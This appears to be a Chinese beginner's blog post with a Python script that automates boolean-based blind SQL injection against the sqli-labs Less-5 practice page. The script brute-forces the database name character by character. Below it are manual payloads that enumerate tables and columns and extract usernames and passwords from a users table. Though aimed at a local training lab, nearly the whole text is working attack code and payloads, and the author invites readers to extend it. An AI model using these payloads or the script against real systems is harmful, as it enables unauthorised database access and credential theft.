import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num len_url = url + "' and (select length(database()) = " + str_num +")--+" response = requests.get(len_url) if str in response.text: print("数据库长度为:%s" %str_num) content(url,str,num) break else: num = num + 1 #此函数判断字符串具体的内容 def content(url,str,num): s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'] con_num = 1 while con_num <= num: str_num = '%d' %con_num for i in s: con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+" response = requests.get(con_url) if str in response.text: fwrite(i) con_num = con_num + 1 #此函数对字符串的内容做记录并输出 def fwrite(i): fp = open("cache.txt",'a') fp.write(i) fp.close() if __name__ == '__main__': url = "http://localhost/sqli-labs/Less-5/?id=1" response = requests.get(url) str = "You are in..........." if str in response.text: length(url,str) else: print("请输入正确的地址")
初学python,只注重实现功能,不要太在意某些细节,如有建议,感谢提出。
#库中有几个表:
1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+
#测表名长度:
1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+
#爆表名:
1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+
#表中有几列:
1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+
#测列名长度:
1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+
#爆列名:
1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+
#爆用户名:
1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+
#爆密码:
1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+
以上标红的就是需要递归测试的地方(标红的地方不显示-.-!,将就看),需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改,因为没有特殊字符以及大写字母等。